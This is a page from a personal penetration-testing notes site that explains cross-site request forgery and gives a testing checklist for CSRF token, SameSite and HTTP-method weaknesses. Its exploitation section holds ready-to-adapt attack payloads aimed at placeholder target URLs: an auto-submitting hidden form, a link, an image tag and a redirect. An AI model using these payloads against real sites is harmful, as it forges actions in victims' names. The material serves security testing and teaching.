theAwful
  • Introduction
  • INTERNALS
    • Responder
      • NBNS/LLMNR
    • mitm6
    • Password Spraying
    • CME/NXC Cheatsheet
    • Kerberoasting
    • AS-REP Roasting
    • Dumping NTDS
  • Metasploit Payload and Listener
    • Encoder
    • Word Macros
    • Payloads
      • Earlybird
    • Metasploit Modules
  • OSEP Cheat Sheet
  • OSEP Challenges
    • Challenge 6
  • C2
    • Sliver
  • Privilege Escalation
    • PowerUp
    • Privilege Escalation
      • Internal Privilege Escalation (Linux)
  • Windows Local Recon
    • SQL Server
    • Application Whitelisting and Credentials
  • Linux Local Recon
  • File Transfer & Execution
  • Phishing
  • Ansible/Jfrog
  • Pivoting
  • Pass-the-hash
  • Remote Access
  • Post-Exploitation
    • Add User
    • AMSI, CLM, AppLocker
  • Credentials
  • Lateral Movement
  • Domain Enumeration
    • Users and Computers
    • ACLs
    • BloodHound
    • GPO
    • Trusts
    • User Hunting
  • Active Directory
    • Domain Recon - Kali
    • Domain Recon - Windows
    • Trusts
    • ADCS
      • ESC3
  • Web Application Testing
    • Host Headers
    • WAF Bypasses
    • Template Injection
    • Prototype Pollution
      • Client-side Prototype Pollution
    • Autorize
    • SQLmap
    • SSRF
    • File Uploads
    • Command Injection
    • XXE
      • Blind XXE
    • CSRF
    • XSS
      • XSS Methodology
      • Bypass WAF
  • MOBILE APPS
    • iOS
      • Install Tools
      • SSL Killswitch
    • Android
      • Install Tools
      • Setting up Burp
      • Red Teaming
  • Exploit Dev
    • AMSI Bypass
      • AMSI OpenSession
      • AMSI ScanBuffer
    • VBA Obfsu
    • APC Injection
    • EarlyBird Injection
  • DFIR
    • Malware Analysis
    • Memory Analysis
      • Volatility
    • Registry Analysis
      • RegRipper
    • Behavior Analysis
      • ShellBags
      • UserAssist
    • Filesystems
  • VISUAL STUDIO
    • Tricks
  • Scripts and Tools
    • Grep IPs from DNS ping
    • OSINT.sh
Powered by GitBook
On this page
  • What is it?
  • Checklist
  • Exploitation
  1. Web Application Testing

CSRF

PreviousBlind XXENextXSS

Last updated 11 months ago

What is it?

CSRF, short for Cross-site request forgery, is a type of web security flaw that enables an attacker to trick users into executing actions they didn't intend to do.

A simple example:

  • A vulnerable web application has the endpoint /updateProfile?id={userid}

  • When a POST request is made to this endpoint the application:

    • Checks the ID is the current user

    • If it is, update the profile with the provided information in the request body

  • When the victim visits the attacker's malicious site, it will:

    • Send a request to the vulnerable web application

    • Because the user is logged into that application, the browser will include cookies (importantly, the session cookie)

  • The vulnerable application processes the request as normal since it came from the user

It's important to note that we need some user interaction for CSRF to work. Typically an attacker would place their payload on a site that they control, and try to entice the target with phishing emails, direct messages on social media, etc. Once the user clicks the link and lands on the page, the payload is triggered.

CSRF defences are now pretty common, so along with just finding places where users can carry out actions, we also need to be able to bypass defences that have not been properly implemented.

Other learning resources:

  • PortSwigger: Web Security Academy

  • The XSS Rat: Bug Bounty Beginner Methodology: CSRF

  • Swisskeyrepo:

Writeups:

Checklist

  • Does every form have a CSRF token?

  • Can we use GET instead of POST (i.e. can our payload be in the URI instead of the body)

Test the token

Test without the token

    • Test other HTTP methods without the token (e.g. GET)

  • Test without the token value (keep the param name, e.g. &csrf=)

  • Test with a random token

  • Test a previous token

  • Test a token from a different session

  • Test with a token of the same length

  • Test for predictability

Test for static values

    • Test for known values (e.g. the token is the user-id)

  • Is the token tied to a cookie other than the session cookie?

    • Can the token be stolen with XSS?

  • Is the referer header being used to validate the request origin?

Do the cookies have SameSite set? (Chrome is lax by default)

  • Can we submit the request with GET?

  • Can we override HTTP methods with `X-Http-Method-Override: GET`

    • Can we override HTTP methods with `_method=POST`

Exploitation

<!-- original payload generated from BURP Suite Pro -->
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://<target-site>/api/employees/add" method=POST>
      <input type="hidden" name="name" value="<payload-info>" />
      <input type="hidden" name="email" value="<payload-info>" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>
<!-- requires user interaction -->
<a href="http://<target-site>m/api/employees/add?name=<payload-info>">Click Me</a>
<!-- doesn't require user interaction -->
<img src="http:/<target-site>/api/employees/add?name=<payload-info>">
document.location = 'https://<target-site>/employees/add?name=<payload-info>';
https://portswigger.net/web-security/csrf
https://www.youtube.com/watch?v=uirJsgvN7Hc
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CSRF%20Injection/README.md